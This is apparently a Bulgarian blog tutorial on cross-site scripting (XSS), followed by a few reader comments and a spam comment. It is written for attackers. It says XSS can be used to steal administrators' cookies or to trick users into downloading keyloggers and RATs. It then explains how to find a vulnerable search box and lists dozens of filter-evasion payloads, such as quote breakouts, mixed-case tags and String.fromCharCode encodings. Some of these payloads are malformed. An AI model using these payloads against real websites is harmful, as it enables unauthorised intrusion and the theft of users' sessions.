Здравейте и благодаря ,че четете този урок за XSS, написан от мен.XSS
Какво е XSS?
XSS е Cross-Site Scripting. Основен вид атака, който се използва за извършване на HTML и Javascript код в уеб-страница. Тази атака може да стане чрез подаване на заявки в текст кутии, или дори в URL. Резултатите се връщат като прочетен HTML текст , така че той изпълнява скриптове, вместо да ги показва като обикновен текст. С XSS атака, можете да открадне Cookies от уеб-администратор, или дори да използвате социално инженерство, за да се манипулира някой да изтегли вирус, който сте създали. Такива като бот мрежа, или плъх, може би дори Keylogger. XSS може да бъде много опасно, но може да бъде e много лека атака. Повечето от атаките са леки XSS , които могат да бъдат трудно да се използват срещу уебсайт. Има много начини, за да използвате XSS във ваша полза. Ще назовем само няколко примера. Можете да използвате полето сигнал (alert box ), за да рекламирате себе си, или да сигнализирате уеб-администратор, че сте открили пробив в сигурността, включващи XSS. Можете също така да настроите Cookie-Stealer/Logger. Всичко, което можете да направите с HTML, може да се използва срещу сайт с тази атака. Аз ще обясня някои от най-важните термини, свързани с XSS.
Какво е HTML и Javascript?
HTML
HTML е нещо като език за програмиране. Разграниченията между език за програмиране и HTML, не са твърде далеч един от друг. Те са двата езика, които се използват за създаване на атрибути, и събития. HTML е език за маркиране, който се използва най-вече за създаване на уебсайтове. HTML е Hyper-Text Markup. Можете да използвате HTML, за да създавате форми, бутони и други неща, които могат да бъдат използвани в уеб страница. Аз силно се съмнявам, че някога ще попаднете на уебсайт, който не съдържа дори малка част на HTML.
Javascript
Първо да уточним ,че има огромна разлика между JAVA и Javascript. Java е език, който е близък до C + +, той може да се използва в игри и приложения. Javascript е нещо подобно на HTML, но определено се различава по много начини. Javascript не се използва толкова много в уеб страници колкото HTML . Javascript се използва повече в приложения извън уеб страници. Подобно на PDF файлове. Javascript може да бъде невероятно полезен език, заедно с HTML. И двата са доста лесни за научаване, и са много динамични.
XSS: Моята първа атака.
Сега, нека да започнем да научаваме наистина добри неща. В този раздел, аз ще обясня как да използвате XSS във ваша полза. Ние също ще стартираме първата ни атака с XSS.
Сега, нашата първа стъпка, е очевидно, да намерим уязвим сайт. Намирането на сайт уязвим към XSS е много по-лесно от намирането на сайт уязвим към SQLi . Проблемът е, че това може да отнеме време, за да се определи дали сайтът е наистина уязвим. С SQLi, можете просто да добавите малко ". Но в XSS, вие трябва да представите (понякога) няколко заявки, за да тествате сайта си за XSS.
Най-уязвими сайтове ще съдържат ( търсене, Login , или полета за регистрация ) . Почти навсякъде се съдържа текст кутия където могат да се използват XSS атаки. Въпреки това, много хора забравят този факт, и никога не я използват в пълния си потенциал , защото си мислят, че е безполезно . Могат да се възползват от XSS чрез сорс кода.
Както и да е, нашият сайт трябва да има някаква текст, кутия за въвеждане на код. Аз просто ще се използва лентата за търсене.
Така че, нека опитаме въвеждането на най-известната, заявка на всички времена.
<script>alert("XSS")</script>
Този малък скрипт, е HTML. Ще се появи малко прозорче казвайки: "XSS".Можете да редактирате тази част, ако ви харесва. Просто не редактирате всякакви други части на скрипта. Сложи това в лентата за търсене и натиснете Enter. Сега, ако всичко е станало както сме описали по горе и се е появило прозорчето значи сте намери сайт който подлежи на XSS! Ако не се появи прозорчето означава че сайта има филтър който проверява дали зададения код е опасен за сайта. Той проверява за всякакви злоумишлени (опасни) неща. Понякога, тези филтри са много слаби и могат да бъдат преминати много лесно, друг път, те могат да бъдат доста трудни за заобикаляне. Има много начини да се за обиколят XSS филтрите. Първо, ние трябва да открием това, което филтъра блокира. В повечето случаи се блокира сигнала ALERT . Ето един пример за този вид филтър:
<script>alert( > XSS DETECTED < )</script> е блокирано и как можем да преминем през този филтър.
За благодарност има опция която криптира съобщението.Ще използваме тази функция наречена "String.FromCharCode". Името обяснява доста , тя криптира текста в ASCII код
Код:
String.fromCharCode(88,83,83)
Може би звучи малко объркващо , но с малко практика се научава лесно . Ето как ще изглежда нашата атака сега :
<script>alert(String.fromCharCode(88,83,83))</script>
Сега вече натискаме Enter и би трябвало да се появи прозорец “XSS” , ако не се появи можете да опитате с някои от тези кодове :
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))
ок и после?!
ReplyDeleteТова al ert ("X SS") къде трябва да се въведе?
ReplyDeleteI have used Kaspersky protection for a couple of years, and I'd recommend this anti virus to everyone.
ReplyDelete